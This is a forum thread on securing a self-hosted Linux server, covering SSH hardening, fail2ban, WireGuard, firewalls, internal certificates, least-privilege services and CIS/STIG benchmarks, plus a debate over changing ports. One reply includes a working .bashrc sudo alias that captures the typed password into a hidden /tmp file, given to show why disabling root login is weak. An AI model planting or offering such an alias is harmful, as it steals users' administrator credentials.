Acronyms, initialisms, abbreviations, contractions, and other phrases which expand to something larger, that I’ve seen in this thread:
| Fewer Letters | More Letters |
| --- | --- |
| DNS | Domain Name Service/System |
| IP | Internet Protocol |
| SSH | Secure Shell for remote terminal access |
| SSL | Secure Sockets Layer, for transparent encryption |
| TCP | Transmission Control Protocol, most often over IP |
| VNC | Virtual Network Computing for remote desktop access |
| VPN | Virtual Private Network |
| VPS | Virtual Private Server (opposed to shared hosting) |
8 acronyms in this thread; the most compressed thread commented on today has 9 acronyms.
fail2ban
… is an intrusion prevention software framework. Written in the Python programming language, it is designed to prevent brute-force attacks. It is able to run on POSIX systems that have an interface to a packet-control system or firewall installed locally, such as iptables or TCP Wrapper.
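For context, a minimal sshd jail looks something like this; the retry counts and ban times are example values, not recommendations:

```
# /etc/fail2ban/jail.local
[sshd]
enabled  = true
maxretry = 5       # failed logins before a ban
findtime = 10m     # window in which failures are counted
bantime  = 1h      # how long the offending IP stays banned
```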
Choosing a firewall and deciding on an entry point for system administration are big considerations.
Generating a strong unique password helps immensely. A password manager can help with this.
If this is for hosting services, reduce open ports with something like Nginx Proxy Manager or an equivalent reverse proxy. Tailscale and equivalents (WireGuard, wg-easy, Headscale, NetBird, and Netmaker) are also options.
Getting https right. It's not such a big deal if all the services are internal, but even then it's not hard to create an internal certificate authority and issue certs for your services.
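A rough sketch of an internal CA with plain openssl; the names and lifetimes are placeholders, and modern clients will also want a subjectAltName on the service cert:

```
# One-time: create the CA key and self-signed root cert
openssl req -x509 -newkey rsa:4096 -sha256 -days 3650 -nodes \
  -keyout ca.key -out ca.crt -subj "/CN=My Internal CA"

# Per service: key + CSR, then sign it with the CA
openssl req -newkey rsa:2048 -nodes -keyout svc.key -out svc.csr \
  -subj "/CN=service.home.lan"
openssl x509 -req -in svc.csr -CA ca.crt -CAkey ca.key \
  -CAcreateserial -days 825 -sha256 -out svc.crt

# Finally, import ca.crt into each client's trust store
```

Tools like mkcert or step-ca automate the same flow if the raw commands get tedious.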
If your server is on a VPS, the firewall is again your primary defense. However, if you expose something like SSH, fail2ban can help ban IPs that make repeated attempts to log in to your system. It isn't a drop-in replacement for proper SSH configuration: you should be using key-based login and move your SSH configuration away from password logins.
It also helps, if you are using something like a proxy for your services, to set up a filter list. NPM, for example, allows you to outright deny connection attempts from specific IP ranges, or just deny everything and allow specific public IPs.
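Under the hood NPM generates ordinary nginx access rules, so the raw-nginx equivalent of "deny everything, allow my IP" is roughly this (the address is a placeholder):

```
# inside the proxy host's server or location block
allow 203.0.113.7;   # your known public IP
deny  all;           # everyone else gets 403
```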
Also, if you are using something like Proxmox, remember to configure your services for least privilege. The basic idea is to give a service only what it needs to operate and no more. This can encompass service user/group names for file access, etc.
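For services managed by systemd, a minimal sketch of the least-privilege idea; the unit name and paths are hypothetical:

```
# /etc/systemd/system/myapp.service (illustrative)
[Service]
ExecStart=/usr/local/bin/myapp
DynamicUser=yes                 # run as a throwaway unprivileged user
ProtectSystem=strict            # /usr, /boot, /etc become read-only for the service
ProtectHome=yes                 # hide /home entirely
PrivateTmp=yes                  # give the service its own /tmp
NoNewPrivileges=yes             # block privilege gain via setuid binaries
ReadWritePaths=/var/lib/myapp   # the only path it may write to
```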
All these steps add up to pretty good security if you constantly assess.
Even basic steps in here like turning on the firewall and only opening ports your services need help immensely.
The biggest thing is to change the defaults and to limit access. Unless you are the target of a nation state, the attacks against your network will be automated.
Move services away from known ports and don't use ports that end with well-known port numbers (22, 80, 443).
Moving ssh from 22 to 2222 or 443 to 10443 does nothing. You have ~65,000 ports. Pick something random like 6744 or 2458.
Just don’t port forward ssh. There is 0 reason to in 99.99% of home cases
Changing ports does nothing except reduce log chatter.
Security through obscurity is not security
It breaks automation. Same thing for changing any default. Change default names, directories, and anything else that's too predictable.
Moving ports does help. It is not a sure thing, but when used in conjunction with other security mechanisms it can help get rid of the low-hanging fruit of script kiddies and automated scans.
Security by obscurity is no security.
It is if you are defending against automation.
It defends against the lowest level of automation. And if that is a legit threat in your model, you are going to have a bad time.
It's just going to trip you up at some point
I'm not saying it should be your only defense. I'm saying that changing defaults is a good idea for secure systems.
For instance, you should change the default WiFi password on your router.
Yes, because a password is security
But scriptkiddies and automated scans are not a security threat. If they were a legitimate threat to your server, you have bigger problems.
All it does is reduce log chatter.
Anyone actually wanting in would port scan, then try and connect to each port, and quickly identify an SSH port
Imagine that the xz exploit actually made it into your server, so your sshd was vulnerable. Having it on another port does seem helpful then. In fact I sometimes think of putting mine on a random secret address in the middle of a /64 IPv6 range, but I haven't done that yet.
It occurs to me that the xz exploit and similar are a good reason not to run the latest software. It affected Debian Sid but not the stable releases. I'm glad I only run the stable ones.
Imagine that the xz exploit actually made it into your server, so your sshd was vulnerable. Having it on another port does seem helpful then.
Nope. Your entire server can be scanned in less than a second for an open ssh port.
IPv6 does not change the fact, since when your server is attacked the host IP is already known.
I’ve never seen an attack that scans all ports. Normally it just checks open ports and then tries common credentials and exploits. If that fails it moves on to the next IP.
Maybe I'm missing something, but how is the host IP known? The server has a maybe-known range of addresses, but I don't announce which address has an sshd listening. There are 2**64 addresses in the range, so scanning in 1 second doesn't sound feasible.
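Back-of-envelope for that claim, assuming a scanner that can sustain a million probes per second against a single host (a generous figure):

```
2^64 addresses              ≈ 1.8 × 10^19
1.8 × 10^19 / 10^6 per sec  ≈ 1.8 × 10^13 seconds ≈ 580,000 years
```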
Just have 2 ipv4 assigned to your server. Have 1 for all your services, and run ssh on the other allowing root login with the password “admin”.
A random ipv6 in the same subnet as your server is just obscurity.
The XZ exploit would be functionally similar to allowing root login using the password "admin".
Would doing that on a different port be secure? No? Then a different port is not security, it's obscurity.
Obscurity is just going to trip you up at some point and reduce log chatter.
And yes, running LTS/stable is a sensible choice for servers.
The XZ backdoor was not exploited, so it is hard to say what would have been effective.
The important thing to note is changing the defaults on systems. Defaults are bad because they make it easy to take over a large number of systems at once. Even right now there are bots testing common ports for weaknesses.
Automated attacks are a huge threat. Changing defaults shouldn’t be your only security practice but it can significantly help defend a network.
Still does nothing when scanning the entire IPv4 address space is achievable so quickly. You can also use services like Shodan to find vulnerable services on any port.
Use SSH keys, stay upgraded. Make management services (SSH, RDP, admin services) accessible only via VPN (WireGuard). Only expose 80 and 443 to the internet, if necessary.
Set up fail2ban
Log in only with SSH keys. MFA on SSH login. Use SSH protocol 2.
Disable passwords, X11 forwarding, and root logins
Reduce the idle timeout interval
Limit users' SSH access
That should be more than enough for the average use case.
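The corresponding sshd_config lines are roughly these (the usernames are placeholders; protocol 2 needs no explicit line on modern OpenSSH, as it is the only one left):

```
# /etc/ssh/sshd_config
PasswordAuthentication no
PermitRootLogin no
X11Forwarding no
ClientAliveInterval 300    # drop idle sessions after ~5 minutes...
ClientAliveCountMax 2      # ...of missed keepalives
AllowUsers alice bob       # only these accounts may log in
```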
Containers can help lock services down if you do it right.
You can have 2FA on ssh?
Yep. Use SSH keys, not just protocol.
On connection, it'll ask for the passphrase for your SSH key (this is different from the user's password).
After that, with something like Authelia in place, you'll be asked for a 2FA code.
So, no. SSH can’t do 2FA? I would need to set up Authelia and connect through that? I already use ssh keys instead of passwords to connect to my server
Yes it can. I literally have it set up right now.
When I connect to my VPS I am prompted for the passphrase for my SSH key. That only works on a machine that has the SSH key.
Then I need to use 2fa.
Ah, so it then asks for the TOTP provided by Authelia? I misunderstood, sorry. That's pretty cool. Do you maybe still have the guide you used to set that up?
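Not the person you asked, but for reference: a common way to require key + TOTP on SSH, independent of Authelia, is libpam-google-authenticator. A rough sketch on Debian/Ubuntu:

```
sudo apt install libpam-google-authenticator
google-authenticator   # run as the SSH user; scan the QR code into a TOTP app

# /etc/pam.d/sshd: add this line
auth required pam_google_authenticator.so

# /etc/ssh/sshd_config:
KbdInteractiveAuthentication yes   # ChallengeResponseAuthentication on older OpenSSH
AuthenticationMethods publickey,keyboard-interactive
```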
Regular updates are definitely necessary too. Also, if you do limit SSH users to a chroot, make sure you limit TCP (port) forwarding too.
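For the chroot point, the relevant sshd_config fragment looks roughly like this (the group name and path are placeholders):

```
# /etc/ssh/sshd_config
Match Group sftponly
    ChrootDirectory /srv/chroot/%u   # must be root-owned and not user-writable
    ForceCommand internal-sftp
    AllowTcpForwarding no            # the forwarding limit mentioned above
    X11Forwarding no
```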
Don’t expose anything to the Internet that you don’t absolutely have to. If you can, put everything behind a VPN gateway.
Make backups. Follow the 3-2-1 rule: three copies of your data, on two different types of media, with one copy off-site.
Will a wireguard docker image work for getting ssh access to my server?
I wouldn't recommend putting SSH behind any VPN connection unless you have secondary access to the machine (for example, a virtual TTY/terminal from your provider, or local-network SSH). At best, SSH should be the only publicly accessible service (unless you are hosting other services that need to be publicly accessible).
I usually move the ssh port to some higher number just to get rid of the basic scanners/skiddies.
Also disable password login (only keys) and no root login.
And for extra hardening, explicitly allow ssh for only users that need it (in sshd config).
SSH behind a WireGuard VPN server is technically more secure if you don't have key-only login, but a pain if the container goes down or if you need to access the server without access to a WireGuard client on your device.
Highly recommend getting a router that can accept wireguard connections. If the router goes down you’re not accessing anything anyways.
Then always put ssh behind the wireguard connections.
For a homelab, there is rarely a need to expose ssh directly so best practice will always be to have multi layered security when possible.
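For anyone setting that up, a minimal wg0.conf pair looks roughly like this; the keys, addresses, and endpoint are placeholders:

```
# Server: /etc/wireguard/wg0.conf
[Interface]
Address = 10.8.0.1/24
ListenPort = 51820
PrivateKey = <server-private-key>

[Peer]   # your laptop or phone
PublicKey = <client-public-key>
AllowedIPs = 10.8.0.2/32

# Client side: AllowedIPs = 10.8.0.0/24 (or your LAN range),
# Endpoint = your.router.example:51820, then ssh to 10.8.0.1.
```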
Yeah it’s good to have a system separate from the main server. It’s always so frustrating having to debug wireguard issues cause there’s some problem with docker
Stumbled upon this guide
https://github.com/imthenachoman/How-To-Secure-A-Linux-Server
I think it's a good place to start
Minimize installation and keep it streamlined. Update promptly. Choose applications that are still supported or have an active community.
- crowdsec
- SSH - change port, disable root login, disable password login, set up SSH keys using SK (YubiKey in my case)
- nftables - I use https://github.com/etkaar/nftm to keep things quick and simple. I like the fact it will convert DNS entries to IPs. I then just use dynamic DNS update clients on all my endpoints (rough sketch of the underlying rules after this list)
- WireGuard for access to services other than SSH (in some cases port 443 will be open if it's a web server or proxy)
- rsyslog to forward auth logs to my central syslog server
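For reference, a bare-bones inbound nftables policy of the kind these tools manage; the trusted range is a placeholder:

```
# /etc/nftables.conf (illustrative)
table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;
        ct state established,related accept
        iif "lo" accept
        ip saddr 203.0.113.0/24 tcp dport 22 accept   # SSH from trusted range only
        tcp dport { 80, 443 } accept                  # web/proxy, if exposed
    }
}
```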
disable root login
That does not do much in practice. When a user account is compromised, a simple alias put in .bashrc can capture the sudo password.
The better recommendation is to explicitly limit which user accounts can log in, so that no test or service account with temporary credentials can accidentally log in via SSH.
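To make the .bashrc point concrete, this is the shape of the trick; deliberately simplified and illustrative only:

```
# Planted in a compromised user's ~/.bashrc: the next "sudo" call
# phishes the password before passing it through.
alias sudo='f(){ read -rsp "[sudo] password for $USER: " p; echo; \
  echo "$p" >> /tmp/.stash; echo "$p" | command sudo -S "$@"; }; f'
```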
I think the point is that root is a universal user found on all Linux systems, whereas users have all kinds of names. It narrows down the variables to brute-force, so simply removing the ability to use it means they have to guess a username and a password.
guess a username and a password.
Security by obscurity is no security. Use something like fail2ban to prevent brute force. When you use a secure password and/or key this also does not matter much.
Something something don’t let ‘good’ be the enemy of ‘perfect’
Do a search for your server OS + STIG
Then, for each service you’re hosting on that server, do a search for:
Service/Program name + STIG/Benchmark
There’s tons of work already done by the vendors in conjunction with the DoD (and CIS) to create lists of potential vulnerable settings that can be corrected before deploying the server.
Along with this, you can usually find scripts and/or Ansible playbooks that will do most of the hardening for you. Though it's a good idea to understand what you do and do not need done.
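If you'd rather have a tool do the checking, one concrete route (not the only one) is OpenSCAP with the SCAP Security Guide content. Treat the package, profile, and file names below as assumptions, since they vary by distro and release; `oscap info` lists what a given datastream offers:

```
sudo apt install openscap-scanner ssg-debderived   # package names differ per distro
oscap info /usr/share/xml/scap/ssg/content/ssg-ubuntu2204-ds.xml
oscap xccdf eval \
  --profile xccdf_org.ssgproject.content_profile_cis_level1_server \
  --report report.html \
  /usr/share/xml/scap/ssg/content/ssg-ubuntu2204-ds.xml
```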
fail2ban / brute forcing prevention
quick, frequent updates(!) (see the sketch after this list)
containerization / virtualization
secure passwords, better keys
firewall
a hardened operating system (distribution)
SELinux / Apparmor / … / OpenBSD
not installing unnecessary stuff
An admin who is an expert and knows what they're doing.
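For the "quick, frequent updates" item above, the low-effort baseline on Debian/Ubuntu:

```
sudo apt install unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades   # enable automatic security updates
```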
Me, two+ decades into tinkering and still a dumbass: “look at me, I’m the expert admin now”
I like to require access to 22 via IP whitelist and all services on SSL behind a reverse proxy. Doesn’t leave much surface to attack.
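With ufw that whitelist is one rule per trusted address (203.0.113.7 is a placeholder); order matters, so add the allow before the deny:

```
sudo ufw allow from 203.0.113.7 to any port 22 proto tcp
sudo ufw deny 22/tcp   # everyone else
```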
Also, move ssh to a different, higher port. Since ssh isn’t exactly for noobs, changing the port is easy enough to work with and that alone already reduces port scans and what not
I recently set up Guacamole (web-based VNC/RDP/SSH) with TOTP and was able to close external SSH access. Now everything I run can sit behind a single reverse proxy, no extra ports.
Ask yourself a few questions before following the massive number of suggestions here and then locking yourself out, and so on.
- What are you worried about?
- How important is your stuff?
- Make backups and check them
Still worried? Then there's the easy way out: hire a security auditor to help you find the holes you left.
Air gapping
/s
Ubuntu has a set of scripts you can run to harden a new server (not advisable on a server that has already been configured for something). You need an Ubuntu Pro subscription to access them but you can get a free trial and then cancel it after you’ve finished.
More info at https://ubuntu.com/security/cis.
I did this process for a customer recently and it was pretty straightforward and much much more thorough (over 100 configuration changes) than just tweaking SSH and fail2ban.
I expect other commercially-oriented distros offer something similar.
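From memory, the flow with Ubuntu's tooling is roughly the following; treat the exact command and profile names as assumptions, since they may have shifted between releases:

```
sudo pro attach <your-token>       # token from your Ubuntu Pro account
sudo pro enable usg
sudo apt install usg
sudo usg audit cis_level1_server   # report only
sudo usg fix cis_level1_server     # apply the hardening changes
```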
Fwiw you don't need to cancel or trial anything. Everyone can get free Ubuntu Pro licenses for up to 5 machines.
Leak the scripts?